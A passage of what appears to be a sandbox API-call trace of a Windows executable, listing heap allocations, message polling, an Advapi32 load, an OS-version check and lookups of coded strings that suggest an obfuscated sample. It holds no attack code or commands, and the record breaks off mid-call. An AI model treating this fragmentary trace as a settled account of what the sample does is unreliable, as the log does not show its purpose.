RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.245] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.246] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.246] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.247] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.247] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.247] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.247] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.248] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.248] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.248] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.249] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.249] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.250] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.250] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0251.250] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.250] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.251] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.251] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.251] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.251] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0251.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0251.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.251] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2c70) returned 1 [0251.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0251.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0251.253] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.253] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.253] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0251.253] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.254] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0251.256] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.256] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.257] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.257] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.257] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.257] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.257] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.257] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.257] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.257] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.258] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.258] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.258] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.258] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.258] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.258] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0251.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0251.258] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0251.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.259] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0251.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.259] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0251.260] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.260] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0251.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 